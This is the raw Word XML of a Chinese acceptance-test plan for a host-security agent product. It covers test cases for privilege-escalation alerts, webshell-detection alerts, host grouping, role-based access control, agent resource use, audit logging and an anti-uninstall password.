                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>在开启本地提权实时监控的情况下能够发现本地提权行为的告警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317" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8059"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317" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8059" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>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317" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8059"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317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8059" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc28031"/>
      <w:bookmarkStart w:id="45" w:name="_Toc585324241"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>Webshell检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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7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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ebshell检查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测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>能够及时发现落盘的web shell文件，能发现Webshell并告警；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预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>多种类型的webshell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测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>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测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>服务端对Oracle-76-01开启webshell实时检测</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>将10个Webshell上传到Oracle-76-0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1 上的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/home/soft/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tomcat/webapps</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>目录下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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>可以在服务端查看到至少3条webshell告警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测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc5795"/>
      <w:bookmarkStart w:id="47" w:name="_Toc2069415227"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理功能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc16573377"/>
      <w:bookmarkStart w:id="49" w:name="_Toc1019"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分组管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>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分组功能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能够根据实际业务，对agent进行分组管理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t>主机操作系统到服务端网络访问关系通畅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25"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录服务端</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>创建一个分组【主机安全测试】</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>把Oracle-76-01添加进分组【主机安全测试】</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>新建一条策略</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>指定该策略下发的主机组为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>【主机安全测试】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结果1：支持对主机进行分组</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2：在Oracle-76-01上检验下发的策略生效，在Oracle-76-02检验策略并没有下发到本机上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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>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pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>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50" w:name="_Toc21210"/>
      <w:bookmarkStart w:id="51" w:name="_Toc1523356776"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>符合RBAC访问控制模型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建多个用户组并赋予不同角色</w:t>
      </w:r>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创建多个用户组并赋予不同角色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符合RBAC访问控制模型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26"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用登录平台</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>创建用户组test1和test2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>创建角色role1和role2，授予不同的权限，并将role1绑定到test1、role2绑定到test2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>创建2个子账号A、B，并将子账号A分到test1、子账号B分到test2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>分别使用子账号A和B登录平台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子账号A只能拥有test1用户组绑定的role1角色所具有的权限；</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>子账号B只能拥有test2用户组绑定的role2角色所具有的权限；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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>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pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>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3"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc757294698"/>
      <w:bookmarkStart w:id="53" w:name="_Toc28149"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非功能指标</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc24624"/>
      <w:bookmarkStart w:id="55" w:name="_Toc1863897164"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>平均系统资源占用情况</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>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Agent平均系统资源占用情况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测试</w:t>
            </w:r>
            <w:r>
              <w:t>Agent在正常使用情况下的资源占用情况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t>主机操作系统到服务端网络访问关系通畅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27"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在测试机上安装agent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在测试机上使用nmon监控系统资源占用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所有测试机上的agent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CPU平均使用率&lt;10%，内存平均占用&lt;200MB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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>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pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>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tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>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
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc1175676559"/>
      <w:bookmarkStart w:id="57" w:name="_Toc28364"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理平台的审计记录功能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:bookmarkEnd w:id="57"/>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能够记录平台用户的操作行为及登录行为。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t>测试主机安全产品是否具有系统审计功能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t>主机操作系统到服务端网络访问关系通畅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28"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录服务端。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>在服务端查看</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>操作日志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结果1：</w:t>
            </w:r>
            <w:r>
              <w:t>能够看到用户，在什么时间，执行了哪些操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，例如开启了异常登录监控，并配置了登录监控相关参数</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果2：</w:t>
            </w:r>
            <w:r>
              <w:t>能够看到</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录流水及是否登录成功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2"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc598891066"/>
      <w:bookmarkStart w:id="59" w:name="_Toc17214"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>评价性测试用例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc29833"/>
      <w:bookmarkStart w:id="61" w:name="_Toc306292773"/>
      <w:r>
        <w:t>用户体验</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc1654"/>
      <w:bookmarkStart w:id="63" w:name="_Toc344333952"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Agent防卸载密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>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Agent防卸载密码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测试</w:t>
            </w:r>
            <w:r>
              <w:t>Agent是否具有防卸载机制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t>主机操作系统到服务端网络访问关系通畅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29"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在服务端设置一台Linux和一台Windows测试机的agent防卸载密码</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置agent防卸载密码123456</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录测试主机，执行Agent卸载脚本</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>输入错误的卸载密码123123</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>输入正确的卸载密码123456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结果1：</w:t>
            </w:r>
            <w:r>
              <w:t>Agent 卸载脚本返回提示，需要输入授权码才能卸载。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果2：输入错误的卸载密码无法卸载Agent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
